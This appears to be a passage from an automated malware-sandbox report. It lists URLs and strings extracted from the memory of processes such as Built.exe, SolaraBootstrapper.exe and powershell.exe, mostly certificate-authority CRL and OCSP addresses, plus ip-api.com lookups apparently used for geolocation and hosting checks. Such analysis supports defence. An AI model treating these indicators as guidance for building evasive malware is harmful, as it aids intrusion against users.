04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax

Source: Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.di
Source: Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.2066149183.000002697F655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft7
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.comd
Source: Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: Built.exe, 00000003.00000003.1856705420.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E5341000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1884484741.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2047540968.000001D5E5341000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: Built.exe, 00000003.00000002.2046197420.000001D5E523A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E5120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: Built.exe, 00000003.00000002.2042918246.000001D5E4D20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000011.00000002.2033751444.00000269116F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.comd
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000011.00000002.1868518526.00000269018A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: XClient.exe, 00000006.00000002.2809336308.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1868518526.0000026901681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300001000.00000004.00000800.00020000.00000000.sdmp, comReviewsession.exe, 00000026.00000002.1871672428.00000000035E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.1868518526.00000269018A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
